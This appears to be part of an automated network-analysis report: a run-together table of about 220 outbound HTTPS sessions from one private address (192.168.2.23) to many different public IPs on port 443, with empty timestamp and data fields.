                                          13316192.168.2.2347532107.123.17.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13317192.168.2.2351364183.44.236.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13318192.168.2.233956424.226.116.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13319192.168.2.235515851.174.251.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13320192.168.2.2335902189.95.250.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13321192.168.2.233701094.22.208.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13322192.168.2.2344728182.50.216.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13323192.168.2.2337068139.181.122.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13324192.168.2.2346984173.132.73.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13325192.168.2.236097675.117.140.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13326192.168.2.2346906162.36.139.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13327192.168.2.234784666.12.38.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13328192.168.2.2356792170.144.205.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13329192.168.2.2339758212.33.151.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13330192.168.2.234898058.54.162.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13331192.168.2.2349556181.195.16.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13332192.168.2.2356284132.147.38.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13333192.168.2.235045838.8.159.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13334192.168.2.2348012223.139.92.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13335192.168.2.2352122165.131.124.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13336192.168.2.2358934177.195.117.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13337192.168.2.2337364121.236.26.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13338192.168.2.2359342126.34.226.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13339192.168.2.233928648.36.38.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13340192.168.2.234622887.162.52.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13341192.168.2.234017696.192.55.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13342192.168.2.2334392135.121.15.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13343192.168.2.234445262.204.117.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13344192.168.2.2339420164.15.132.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13345192.168.2.23361742.211.122.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13346192.168.2.234112296.243.215.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13347192.168.2.2349904181.230.99.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13348192.168.2.2337928176.58.13.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13349192.168.2.235332852.47.176.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13350192.168.2.2337162213.191.66.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13351192.168.2.2334014188.44.109.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13352192.168.2.2333418207.16.243.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13353192.168.2.2349458180.40.99.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13354192.168.2.234876890.241.234.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13355192.168.2.2335970137.203.165.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13356192.168.2.235398471.120.238.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13357192.168.2.2350836156.238.166.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13358192.168.2.234338274.113.22.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13359192.168.2.2334864168.160.18.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13360192.168.2.234638265.128.108.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13361192.168.2.233793639.52.255.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13362192.168.2.235158817.231.175.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13363192.168.2.2340092149.26.238.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13364192.168.2.2335006163.83.36.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13365192.168.2.2357774221.214.34.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13366192.168.2.2339246174.148.3.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13367192.168.2.234059027.169.143.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13368192.168.2.2345424208.77.96.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13369192.168.2.2342862216.93.108.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13370192.168.2.233754283.112.188.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13371192.168.2.235403875.162.9.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13372192.168.2.2349546201.18.19.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13373192.168.2.2360476221.46.254.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13374192.168.2.2346132128.96.105.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13375192.168.2.2358454210.246.171.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13376192.168.2.2336512132.67.142.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13377192.168.2.2356650159.210.252.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13378192.168.2.2336660197.96.177.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13379192.168.2.235031835.169.132.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13380192.168.2.233792492.136.208.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13381192.168.2.2338328112.248.247.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13382192.168.2.2354652173.11.128.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13383192.168.2.234100866.203.160.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13384192.168.2.2345746188.205.15.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13385192.168.2.2345152196.137.63.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13386192.168.2.2338644175.207.251.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13387192.168.2.2348340223.91.202.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13388192.168.2.235139231.210.171.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13389192.168.2.2339462136.254.123.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13390192.168.2.2338310219.223.20.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13391192.168.2.2333842124.225.192.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13392192.168.2.2346270105.3.27.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13393192.168.2.235250492.122.126.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13394192.168.2.234947288.181.102.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13395192.168.2.2342064156.26.23.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13396192.168.2.235311053.140.244.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13397192.168.2.2344112222.207.125.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13398192.168.2.2354370143.7.217.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13399192.168.2.2345494191.127.8.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13400192.168.2.2352778199.124.176.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13401192.168.2.2346836144.114.66.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13402192.168.2.2333444189.200.202.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13403192.168.2.2350340147.209.76.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13404192.168.2.2349508155.84.185.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13405192.168.2.2350206196.192.127.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13406192.168.2.2348382202.163.206.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13407192.168.2.235646447.79.59.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13408192.168.2.2357416150.88.108.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13409192.168.2.2359634171.126.241.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13410192.168.2.2358728153.54.169.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13411192.168.2.2346388139.10.211.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13412192.168.2.2349120165.255.208.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13413192.168.2.2357336163.205.40.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13414192.168.2.235263887.239.0.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13415192.168.2.2333358194.52.95.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13416192.168.2.2337244100.181.127.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13417192.168.2.2359352179.169.251.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13418192.168.2.2343930209.234.195.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13419192.168.2.236086895.114.194.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13420192.168.2.2350962170.213.166.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13421192.168.2.23528669.106.30.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13422192.168.2.234767013.73.212.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13423192.168.2.2359492180.84.40.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13424192.168.2.233598499.208.163.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13425192.168.2.234464654.35.194.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13426192.168.2.2344036162.244.177.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13427192.168.2.2350934180.12.91.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13428192.168.2.2359926218.172.165.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13429192.168.2.2338588163.110.234.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13430192.168.2.2348132104.23.210.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13431192.168.2.234512269.39.212.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13432192.168.2.2340632172.200.39.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13433192.168.2.2354480221.43.244.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13434192.168.2.234976868.208.150.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13435192.168.2.235500073.96.63.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13436192.168.2.234263063.59.8.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13437192.168.2.234931079.31.146.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13438192.168.2.234485497.253.186.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13439192.168.2.234533044.161.33.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13440192.168.2.235388693.118.68.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13441192.168.2.234713819.68.38.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13442192.168.2.2354580197.137.150.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13443192.168.2.234524087.250.51.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13444192.168.2.2355674154.83.84.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13445192.168.2.235576463.160.230.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13446192.168.2.234285664.208.195.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13447192.168.2.236014071.244.244.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13448192.168.2.2344544117.27.81.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13449192.168.2.235082898.86.179.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13450192.168.2.2357728197.11.120.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13451192.168.2.235461285.110.198.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13452192.168.2.234452890.20.148.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13453192.168.2.2356358203.0.13.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13454192.168.2.2346662132.114.88.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13455192.168.2.2359394217.200.135.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13456192.168.2.2355578143.171.202.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13457192.168.2.233320432.52.167.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13458192.168.2.23468861.76.5.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13459192.168.2.234918832.235.33.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13460192.168.2.2346178124.58.47.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13461192.168.2.2359040155.96.48.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13462192.168.2.234040645.123.226.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13463192.168.2.235825252.161.205.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13464192.168.2.23518608.112.88.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13465192.168.2.2355942217.204.72.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13466192.168.2.2351456220.9.209.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13467192.168.2.234936859.115.174.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13468192.168.2.234306432.185.93.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13469192.168.2.2352786171.38.221.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13470192.168.2.2358290189.20.156.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13471192.168.2.2351008102.149.128.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13472192.168.2.2344840188.142.4.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13473192.168.2.234436452.197.239.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13474192.168.2.234762672.26.48.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13475192.168.2.234882652.195.89.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13476192.168.2.2341498206.17.171.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13477192.168.2.2352058188.76.163.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13478192.168.2.235855299.225.61.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13479192.168.2.233466249.151.169.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13480192.168.2.2356870142.243.46.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13481192.168.2.2350656158.15.6.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13482192.168.2.2358506164.171.176.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13483192.168.2.2357448162.67.86.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13484192.168.2.235012462.251.195.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13485192.168.2.235184288.31.184.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13486192.168.2.233769899.203.231.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13487192.168.2.2337182170.77.238.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13488192.168.2.2334054207.150.28.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13489192.168.2.235505291.156.20.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13490192.168.2.2346746120.53.197.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13491192.168.2.2355374166.112.115.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13492192.168.2.2353266129.54.177.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13493192.168.2.2351434135.211.179.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13494192.168.2.2357742189.48.100.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13495192.168.2.235146298.31.8.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13496192.168.2.233900043.57.249.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13497192.168.2.2360500178.133.97.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13498192.168.2.2347446109.179.186.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13499192.168.2.2333046167.235.56.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13500192.168.2.2341842211.186.154.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13501192.168.2.2347772192.160.244.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13502192.168.2.235279266.203.185.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13503192.168.2.234728245.2.12.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13504192.168.2.234197025.162.138.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13505192.168.2.233466240.134.182.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13506192.168.2.236093459.210.231.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13507192.168.2.2352428105.54.30.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13508192.168.2.2351068104.27.231.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13509192.168.2.2347322164.103.51.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13510192.168.2.2339982196.75.207.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13511192.168.2.2348872162.80.5.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13512192.168.2.234779881.196.192.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13513192.168.2.2356070110.138.91.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13514192.168.2.2343166111.70.195.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13515192.168.2.2340904189.253.95.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13516192.168.2.2343850208.55.247.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13517192.168.2.233306693.192.147.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13518192.168.2.235048297.88.165.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13519192.168.2.2338650150.76.65.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13520192.168.2.2348206117.51.24.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13521192.168.2.235038299.175.68.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13522192.168.2.234239676.202.22.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13523192.168.2.2352530102.31.185.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13524192.168.2.2345334217.240.99.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13525192.168.2.2341820131.98.81.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13526192.168.2.235895676.211.13.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13527192.168.2.235460664.88.240.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13528192.168.2.2350586183.208.199.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13529192.168.2.2349464159.238.102.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13530192.168.2.2348718189.217.238.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13531192.168.2.235491276.187.21.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13532192.168.2.2337624182.75.43.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13533192.168.2.235080824.208.78.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13534192.168.2.234163418.128.22.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13535192.168.2.233577089.158.244.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13536192.168.2.235474037.70.253.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13537192.168.2.2348910181.75.248.157443
                                          TimestampBytes transferredDirectionData


